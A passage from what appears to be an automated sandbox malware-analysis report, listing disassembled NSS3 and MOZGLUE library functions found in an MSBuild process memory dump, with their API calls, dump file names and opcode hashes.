                                                                                        • Associated: 00000004.00000002.2386152856.000000006C7E0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386187014.000000006C7E5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_6c600000_MSBuild.jbxd
                                                                                        Similarity
                                                                                        • API ID: Error$CriticalDeleteSectionfree$Value
                                                                                        • String ID:
                                                                                        • API String ID: 1757055810-0
                                                                                        • Opcode ID: e5c7436614e6394e3b29e7745c5e5360ef50c6d90cad1f295955a1f91b35069d
                                                                                        • Instruction ID: b842d13b0abc55a391537ddf8dcb463a4a7f8834ff94c831afa3db87062726f4
                                                                                        • Opcode Fuzzy Hash: e5c7436614e6394e3b29e7745c5e5360ef50c6d90cad1f295955a1f91b35069d
                                                                                        • Instruction Fuzzy Hash: D501FC72B096A15BFF20AFA49E0DB493B787B1E71AF580034E50656F40DF64A1288795
                                                                                        Function 6C722E50 Relevance: 9.3, APIs: 6, Instructions: 251COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • memcpy.VCRUNTIME140(?,?,00000000), ref: 6C723046
                                                                                          • Part of subcall function 6C70EE50: PR_SetError.NSS3(FFFFE013,00000000), ref: 6C70EE85
                                                                                        • PK11_AEADOp.NSS3(?,00000004,?,?,?,?,?,00000000,?,B8830845,?,?,00000000,6C6F7FFB), ref: 6C72312A
                                                                                        • memcpy.VCRUNTIME140(00000000,?,?), ref: 6C723154
                                                                                        • PR_SetError.NSS3(FFFFE001,00000000), ref: 6C722E8B
                                                                                          • Part of subcall function 6C72C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C72C2BF
                                                                                          • Part of subcall function 6C70F110: PR_SetError.NSS3(FFFFE013,00000000,00000000,0000A48E,00000000,?,6C6F9BFF,?,00000000,00000000), ref: 6C70F134
                                                                                        • memcpy.VCRUNTIME140(8B3C75C0,?,6C6F7FFA), ref: 6C722EA4
                                                                                        • PR_SetError.NSS3(FFFFE005,00000000), ref: 6C72317B
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2383759564.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2383730771.000000006C600000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2385733567.000000006C79F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386069150.000000006C7DE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386120788.000000006C7DF000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386152856.000000006C7E0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386187014.000000006C7E5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_6c600000_MSBuild.jbxd
                                                                                        Similarity
                                                                                        • API ID: Error$memcpy$K11_Value
                                                                                        • String ID:
                                                                                        • API String ID: 2334702667-0
                                                                                        • Opcode ID: b06bda253cf5dc8e9b1eaf5e657fb078d26dbe3be2585754f53f9542fb9890e5
                                                                                        • Instruction ID: d41dc673e8eb2474e677fb5cad586a799ec1618d9c91e9f4d877b1c436d6618c
                                                                                        • Opcode Fuzzy Hash: b06bda253cf5dc8e9b1eaf5e657fb078d26dbe3be2585754f53f9542fb9890e5
                                                                                        • Instruction Fuzzy Hash: BAA1CD71A002189FDB24CF54CC84BEAB7B5EF49318F0481A9ED4967741E735AE85CFA2
                                                                                        Function 6C6EED00 Relevance: 9.2, APIs: 6, Instructions: 228memoryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • PORT_ArenaAlloc_Util.NSS3(?,00000000), ref: 6C6EED6B
                                                                                        • PORT_Alloc_Util.NSS3(00000000), ref: 6C6EEDCE
                                                                                          • Part of subcall function 6C6E0BE0: malloc.MOZGLUE(6C6D8D2D,?,00000000,?), ref: 6C6E0BF8
                                                                                          • Part of subcall function 6C6E0BE0: TlsGetValue.KERNEL32(6C6D8D2D,?,00000000,?), ref: 6C6E0C15
                                                                                        • free.MOZGLUE(00000000,?,?,?,?,6C6EB04F), ref: 6C6EEE46
                                                                                        • PORT_ArenaAlloc_Util.NSS3(?,?), ref: 6C6EEECA
                                                                                        • PORT_ArenaAlloc_Util.NSS3(?,0000000C), ref: 6C6EEEEA
                                                                                        • PORT_ArenaAlloc_Util.NSS3(?,00000008), ref: 6C6EEEFB
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2383759564.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2383730771.000000006C600000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2385733567.000000006C79F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386069150.000000006C7DE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386120788.000000006C7DF000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386152856.000000006C7E0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386187014.000000006C7E5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_6c600000_MSBuild.jbxd
                                                                                        Similarity
                                                                                        • API ID: Alloc_Util$Arena$Valuefreemalloc
                                                                                        • String ID:
                                                                                        • API String ID: 3768380896-0
                                                                                        • Opcode ID: e114d9741633866e23008c0d0bd72aad9d94258aa5875cb520f80e34083a681d
                                                                                        • Instruction ID: 27500ddb50d3636ee1685233ef878f89e46ef463ce4b5eef45d0035c92ae600d
                                                                                        • Opcode Fuzzy Hash: e114d9741633866e23008c0d0bd72aad9d94258aa5875cb520f80e34083a681d
                                                                                        • Instruction Fuzzy Hash: 17819BB1A062059FEB10CF58D884BAB7BF5BF8D308F14442AE8159B751DB30E905CBE9
                                                                                        Function 6C6ECCF0 Relevance: 9.2, APIs: 6, Instructions: 171memorythreadCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 6C6EC6B0: SECOID_FindOID_Util.NSS3(00000000,00000004,?,6C6EDAE2,?), ref: 6C6EC6C2
                                                                                        • PR_Now.NSS3 ref: 6C6ECD35
                                                                                          • Part of subcall function 6C749DB0: GetSystemTime.KERNEL32(?,?,?,?,00000001,00000000,?,6C790A27), ref: 6C749DC6
                                                                                          • Part of subcall function 6C749DB0: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,00000001,00000000,?,6C790A27), ref: 6C749DD1
                                                                                          • Part of subcall function 6C749DB0: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6C749DED
                                                                                          • Part of subcall function 6C6D6C00: PR_SetError.NSS3(FFFFE005,00000000,?,?,00000000,00000000,00000000,?,6C681C6F,00000000,00000004,?,?), ref: 6C6D6C3F
                                                                                        • PR_GetCurrentThread.NSS3 ref: 6C6ECD54
                                                                                          • Part of subcall function 6C749BF0: TlsGetValue.KERNEL32(?,?,?,6C790A75), ref: 6C749C07
                                                                                          • Part of subcall function 6C6D7260: PR_SetError.NSS3(FFFFE005,00000000,?,?,00000000,00000000,00000000,?,6C681CCC,00000000,00000000,?,?), ref: 6C6D729F
                                                                                        • SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6C6ECD9B
                                                                                        • PORT_ArenaGrow_Util.NSS3(00000000,?,?,?), ref: 6C6ECE0B
                                                                                        • PORT_ArenaAlloc_Util.NSS3(00000000,00000010), ref: 6C6ECE2C
                                                                                          • Part of subcall function 6C6E10C0: TlsGetValue.KERNEL32(?,6C688802,00000000,00000008,?,6C67EF74,00000000), ref: 6C6E10F3
                                                                                          • Part of subcall function 6C6E10C0: EnterCriticalSection.KERNEL32(?,?,6C688802,00000000,00000008,?,6C67EF74,00000000), ref: 6C6E110C
                                                                                          • Part of subcall function 6C6E10C0: PL_ArenaAllocate.NSS3(?,?,?,6C688802,00000000,00000008,?,6C67EF74,00000000), ref: 6C6E1141
                                                                                          • Part of subcall function 6C6E10C0: PR_Unlock.NSS3(?,?,?,6C688802,00000000,00000008,?,6C67EF74,00000000), ref: 6C6E1182
                                                                                          • Part of subcall function 6C6E10C0: TlsGetValue.KERNEL32(?,6C688802,00000000,00000008,?,6C67EF74,00000000), ref: 6C6E119C
                                                                                        • PORT_ArenaMark_Util.NSS3(00000000), ref: 6C6ECE40
                                                                                          • Part of subcall function 6C6E14C0: TlsGetValue.KERNEL32 ref: 6C6E14E0
                                                                                          • Part of subcall function 6C6E14C0: EnterCriticalSection.KERNEL32 ref: 6C6E14F5
                                                                                          • Part of subcall function 6C6E14C0: PR_Unlock.NSS3 ref: 6C6E150D
                                                                                          • Part of subcall function 6C6ECEE0: PORT_ArenaMark_Util.NSS3(?,6C6ECD93,?), ref: 6C6ECEEE
                                                                                          • Part of subcall function 6C6ECEE0: PORT_ArenaAlloc_Util.NSS3(?,00000018,?,6C6ECD93,?), ref: 6C6ECEFC
                                                                                          • Part of subcall function 6C6ECEE0: SECOID_FindOIDByTag_Util.NSS3(00000023,?,?,?,6C6ECD93,?), ref: 6C6ECF0B
                                                                                          • Part of subcall function 6C6ECEE0: SECITEM_CopyItem_Util.NSS3(?,00000000,00000000,?,?,?,?,6C6ECD93,?), ref: 6C6ECF1D
                                                                                          • Part of subcall function 6C6ECEE0: PORT_ArenaAlloc_Util.NSS3(?,00000008,?,?,?,?,?,?,?,6C6ECD93,?), ref: 6C6ECF47
                                                                                          • Part of subcall function 6C6ECEE0: PORT_ArenaAlloc_Util.NSS3(?,0000000C,?,?,?,?,?,?,?,?,?,6C6ECD93,?), ref: 6C6ECF67
                                                                                          • Part of subcall function 6C6ECEE0: SECITEM_CopyItem_Util.NSS3(?,00000000,6C6ECD93,?,?,?,?,?,?,?,?,?,?,?,6C6ECD93,?), ref: 6C6ECF78
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2383759564.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2383730771.000000006C600000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2385733567.000000006C79F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386069150.000000006C7DE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386120788.000000006C7DF000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386152856.000000006C7E0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386187014.000000006C7E5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_6c600000_MSBuild.jbxd
                                                                                        Similarity
                                                                                        • API ID: Util$Arena$Alloc_Value$Item_Time$CopyCriticalEnterErrorFindMark_SectionSystemUnlock$AllocateCurrentFileGrow_Tag_ThreadUnothrow_t@std@@@Zfree__ehfuncinfo$??2@
                                                                                        • String ID:
                                                                                        • API String ID: 3748922049-0
                                                                                        • Opcode ID: 5bc4454397843f7995ae3577afe451c8e264abc12c6754aeca232f9908d778fe
                                                                                        • Instruction ID: 4b5ccf638261d324c56a765a09ce250565cb5902f46c8a10c3fb670b9b8f57a6
                                                                                        • Opcode Fuzzy Hash: 5bc4454397843f7995ae3577afe451c8e264abc12c6754aeca232f9908d778fe
                                                                                        • Instruction Fuzzy Hash: B351D672A06204AFE710DF69DC40BEA7BF4AF4C348F250526D9169B740EB31ED06CB99
                                                                                        Function 6C722640 Relevance: 9.1, APIs: 6, Instructions: 119COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • memcpy.VCRUNTIME140(?,8B7874C0,?,?,?,00000000,?,?,?,6C6F99E8,00000000,00000000,?,?,?,?), ref: 6C72267E
                                                                                        • memset.VCRUNTIME140(00000000,00000000,?,?,?,00000000,?,?,?,6C6F99E8,00000000,00000000,?,?,?,?), ref: 6C72269D
                                                                                        • memcpy.VCRUNTIME140(00000000,8B7874C0,?,?,?,?,?,?,00000000,?,?,?,6C6F99E8,00000000,00000000,?), ref: 6C7226AC
                                                                                        • PK11_AEADOp.NSS3(00000000,00000000,?,?,?,?,?,?,?,?,?,00000000,00000000,6C6F99E8), ref: 6C722714
                                                                                        • PR_SetError.NSS3(FFFFE005,00000000,?,?,00000000,?,?,?,6C6F99E8,00000000,00000000,?,?,?,?,?), ref: 6C722737
                                                                                        • memcpy.VCRUNTIME140(?,?,00000000), ref: 6C722750
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2383759564.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2383730771.000000006C600000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2385733567.000000006C79F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386069150.000000006C7DE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386120788.000000006C7DF000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386152856.000000006C7E0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386187014.000000006C7E5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_6c600000_MSBuild.jbxd
                                                                                        Similarity
                                                                                        • API ID: memcpy$ErrorK11_memset
                                                                                        • String ID:
                                                                                        • API String ID: 2328202073-0
                                                                                        • Opcode ID: 34501c04ef26750019a72335728339d401fc578a9d658ee9b6202f0374ca6a64
                                                                                        • Instruction ID: be925f9d0ef7fe5beb8d9cced65447910312c1d0eb65c13befc1bdf4e766448c
                                                                                        • Opcode Fuzzy Hash: 34501c04ef26750019a72335728339d401fc578a9d658ee9b6202f0374ca6a64
                                                                                        • Instruction Fuzzy Hash: A6416A32A00119AFDF049EA8CD88EEE77B5FF98318F554128FA18A7610D735EC65CB90
                                                                                        Function 6C6965D0 Relevance: 9.1, APIs: 6, Instructions: 111memoryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • PORT_Alloc_Util.NSS3(-00000007), ref: 6C69660F
                                                                                          • Part of subcall function 6C6E0BE0: malloc.MOZGLUE(6C6D8D2D,?,00000000,?), ref: 6C6E0BF8
                                                                                          • Part of subcall function 6C6E0BE0: TlsGetValue.KERNEL32(6C6D8D2D,?,00000000,?), ref: 6C6E0C15
                                                                                        • free.MOZGLUE(00000000), ref: 6C696660
                                                                                        • PR_SetError.NSS3(FFFFE00A,00000000), ref: 6C69667B
                                                                                        • SGN_DecodeDigestInfo.NSS3(?), ref: 6C69669B
                                                                                        • SECOID_GetAlgorithmTag_Util.NSS3(-00000004), ref: 6C6966B0
                                                                                        • PORT_FreeArena_Util.NSS3(?,00000001), ref: 6C6966C8
                                                                                          • Part of subcall function 6C6C25D0: TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,-00000001,?,?,?,6C69662E,?,?), ref: 6C6C2670
                                                                                          • Part of subcall function 6C6C25D0: EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,-00000001,?,?,?,6C69662E,?), ref: 6C6C2684
                                                                                          • Part of subcall function 6C6C25D0: PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,-00000001), ref: 6C6C26C2
                                                                                          • Part of subcall function 6C6C25D0: TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,-00000001,?), ref: 6C6C26E0
                                                                                          • Part of subcall function 6C6C25D0: EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,-00000001), ref: 6C6C26F4
                                                                                          • Part of subcall function 6C6C25D0: PR_Unlock.NSS3(?), ref: 6C6C274D
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2383759564.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2383730771.000000006C600000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2385733567.000000006C79F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386069150.000000006C7DE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386120788.000000006C7DF000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386152856.000000006C7E0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386187014.000000006C7E5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_6c600000_MSBuild.jbxd
                                                                                        Similarity
                                                                                        • API ID: UtilValue$CriticalEnterSectionUnlock$AlgorithmAlloc_Arena_DecodeDigestErrorFreeInfoTag_freemalloc
                                                                                        • String ID:
                                                                                        • API String ID: 2025608128-0
                                                                                        • Opcode ID: ab9330b15915a2491da3a2277d168d7a108d9074ebd38b7749c5ab2202cae7c3
                                                                                        • Instruction ID: 7b2bcf4655199320a41386822fcd65410f788a06283d409ac7c49b421e2f09fe
                                                                                        • Opcode Fuzzy Hash: ab9330b15915a2491da3a2277d168d7a108d9074ebd38b7749c5ab2202cae7c3
                                                                                        • Instruction Fuzzy Hash: 263163B5E0121A9BDB40CFA8D841AAE77F4AF49358F140028EC15E7701E731E904CBEA
                                                                                        Function 6C692E60 Relevance: 9.1, APIs: 6, Instructions: 105COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • SECOID_FindOID_Util.NSS3(?,00000000,00000001,00000000,?,?,6C682D1A), ref: 6C692E7E
                                                                                          • Part of subcall function 6C6E07B0: PL_HashTableLookupConst.NSS3(?,FFFFFFFF,?,?,6C688298,?,?,?,6C67FCE5,?), ref: 6C6E07BF
                                                                                          • Part of subcall function 6C6E07B0: PL_HashTableLookup.NSS3(?,?), ref: 6C6E07E6
                                                                                          • Part of subcall function 6C6E07B0: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C6E081B
                                                                                          • Part of subcall function 6C6E07B0: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C6E0825
                                                                                        • PR_Now.NSS3 ref: 6C692EDF
                                                                                        • CERT_FindCertIssuer.NSS3(?,00000000,?,0000000B), ref: 6C692EE9
                                                                                        • SECOID_FindOID_Util.NSS3(-000000D8,?,?,?,?,6C682D1A), ref: 6C692F01
                                                                                        • CERT_DestroyCertificate.NSS3(?,?,?,?,?,?,6C682D1A), ref: 6C692F50
                                                                                        • SECITEM_CopyItem_Util.NSS3(?,?,?), ref: 6C692F81
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2383759564.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2383730771.000000006C600000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2385733567.000000006C79F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386069150.000000006C7DE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386120788.000000006C7DF000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386152856.000000006C7E0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386187014.000000006C7E5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_6c600000_MSBuild.jbxd
                                                                                        Similarity
                                                                                        • API ID: FindUtil$ErrorHashLookupTable$CertCertificateConstCopyDestroyIssuerItem_
                                                                                        • String ID:
                                                                                        • API String ID: 287051776-0
                                                                                        • Opcode ID: 6b467407cb95a1ae026b0ee79dd1b2f7e38d058143e2b848c32e4eb652019a89
                                                                                        • Instruction ID: bd1443a0cef88eb9a3f173ababb099169892094e2c58019938e48e064a358bd4
                                                                                        • Opcode Fuzzy Hash: 6b467407cb95a1ae026b0ee79dd1b2f7e38d058143e2b848c32e4eb652019a89
                                                                                        • Instruction Fuzzy Hash: AF31257154210287E710C655DC8CFBE7365EF81318F64457AD41BD7ED0EB31984ACA5E
                                                                                        Function 6C68AE50 Relevance: 9.1, APIs: 6, Instructions: 85COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • PORT_NewArena_Util.NSS3(00000800), ref: 6C68AEB3
                                                                                        • SEC_ASN1EncodeUnsignedInteger_Util.NSS3(00000000,?,00000000), ref: 6C68AECA
                                                                                        • PR_SetError.NSS3(FFFFE013,00000000), ref: 6C68AEDD
                                                                                        • PR_SetError.NSS3(FFFFE022,00000000), ref: 6C68AF02
                                                                                        • SEC_ASN1EncodeItem_Util.NSS3(?,?,?,6C7A9500), ref: 6C68AF23
                                                                                          • Part of subcall function 6C6DF080: PORT_FreeArena_Util.NSS3(00000000,00000000,?,?,?,?,?,?,?,?,?), ref: 6C6DF0C8
                                                                                          • Part of subcall function 6C6DF080: PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6C6DF122
                                                                                        • PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6C68AF37
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2383759564.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2383730771.000000006C600000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2385733567.000000006C79F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386069150.000000006C7DE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386120788.000000006C7DF000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386152856.000000006C7E0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386187014.000000006C7E5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_6c600000_MSBuild.jbxd
                                                                                        Similarity
                                                                                        • API ID: Util$Arena_$Free$EncodeError$Integer_Item_Unsigned
                                                                                        • String ID:
                                                                                        • API String ID: 3714604333-0
                                                                                        • Opcode ID: 051f13771990ad61cfad898278f0ab4407dba077c95d01a1301c02063ba528e8
                                                                                        • Instruction ID: a98154fc65ce94d7985c49088787675719ea4145fb0c898d1f7e4dc896f7e0d8
                                                                                        • Opcode Fuzzy Hash: 051f13771990ad61cfad898278f0ab4407dba077c95d01a1301c02063ba528e8
                                                                                        • Instruction Fuzzy Hash: C02129B290A200ABEB108F189C41B9A7BE4AF8572CF144719FC549B7D2F731D54587BB
                                                                                        Function 6C70EE50 Relevance: 9.1, APIs: 6, Instructions: 83memoryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • PR_SetError.NSS3(FFFFE013,00000000), ref: 6C70EE85
                                                                                        • realloc.MOZGLUE(9DAE394A,?), ref: 6C70EEAE
                                                                                        • PORT_Alloc_Util.NSS3(?), ref: 6C70EEC5
                                                                                          • Part of subcall function 6C6E0BE0: malloc.MOZGLUE(6C6D8D2D,?,00000000,?), ref: 6C6E0BF8
                                                                                          • Part of subcall function 6C6E0BE0: TlsGetValue.KERNEL32(6C6D8D2D,?,00000000,?), ref: 6C6E0C15
                                                                                        • htonl.WSOCK32(?), ref: 6C70EEE3
                                                                                        • htonl.WSOCK32(00000000,?), ref: 6C70EEED
                                                                                        • memcpy.VCRUNTIME140(?,?,?,00000000,?), ref: 6C70EF01
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2383759564.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2383730771.000000006C600000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2385733567.000000006C79F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386069150.000000006C7DE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386120788.000000006C7DF000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386152856.000000006C7E0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386187014.000000006C7E5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_6c600000_MSBuild.jbxd
                                                                                        Similarity
                                                                                        • API ID: htonl$Alloc_ErrorUtilValuemallocmemcpyrealloc
                                                                                        • String ID:
                                                                                        • API String ID: 1351805024-0
                                                                                        • Opcode ID: 0444e237ce765a7635604f4e3bed7d7bfbca8d35d5b076707e9ee9737992d3ea
                                                                                        • Instruction ID: 5ef3818e08906be1f584c0c18873a01a248051863720fe83d3ba362715857001
                                                                                        • Opcode Fuzzy Hash: 0444e237ce765a7635604f4e3bed7d7bfbca8d35d5b076707e9ee9737992d3ea
                                                                                        • Instruction Fuzzy Hash: C621E171A0021C9BDB109F28DE8469AB7E8EF49358F148179EC489B741E730EC04CBE2
                                                                                        Function 6C6E2550 Relevance: 9.1, APIs: 6, Instructions: 61memoryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000), ref: 6C6E2576
                                                                                        • PORT_Alloc_Util.NSS3(00000000), ref: 6C6E2585
                                                                                          • Part of subcall function 6C6E0BE0: malloc.MOZGLUE(6C6D8D2D,?,00000000,?), ref: 6C6E0BF8
                                                                                          • Part of subcall function 6C6E0BE0: TlsGetValue.KERNEL32(6C6D8D2D,?,00000000,?), ref: 6C6E0C15
                                                                                        • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000000,00000000), ref: 6C6E25A1
                                                                                        • _waccess.API-MS-WIN-CRT-FILESYSTEM-L1-1-0(00000000,?), ref: 6C6E25AF
                                                                                        • free.MOZGLUE(00000000), ref: 6C6E25BB
                                                                                        • free.MOZGLUE(00000000), ref: 6C6E25CA
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2383759564.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2383730771.000000006C600000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2385733567.000000006C79F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386069150.000000006C7DE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386120788.000000006C7DF000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386152856.000000006C7E0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386187014.000000006C7E5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_6c600000_MSBuild.jbxd
                                                                                        Similarity
                                                                                        • API ID: ByteCharMultiWidefree$Alloc_UtilValue_waccessmalloc
                                                                                        • String ID:
                                                                                        • API String ID: 3520324648-0
                                                                                        • Opcode ID: 50e65796174ee478bc0e949d594a75a1eee7aa7d86a47d09df32777f9d9d5031
                                                                                        • Instruction ID: 2fb1201073eb942f8ff2dba71ca76ed2c7a72d8c66c1a9fa3b9ead77a9c5c1c8
                                                                                        • Opcode Fuzzy Hash: 50e65796174ee478bc0e949d594a75a1eee7aa7d86a47d09df32777f9d9d5031
                                                                                        • Instruction Fuzzy Hash: 3C01D2B170A2127BFF1027659C19E37375EEB457A6B100131BD19C5681ED60D8008AF5
                                                                                        Function 6C66C4E0 Relevance: 9.1, APIs: 6, Instructions: 52COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2383759564.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2383730771.000000006C600000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2385733567.000000006C79F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386069150.000000006C7DE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386120788.000000006C7DF000.00000008.00000001.01000000.00000009.sdmpDownload File
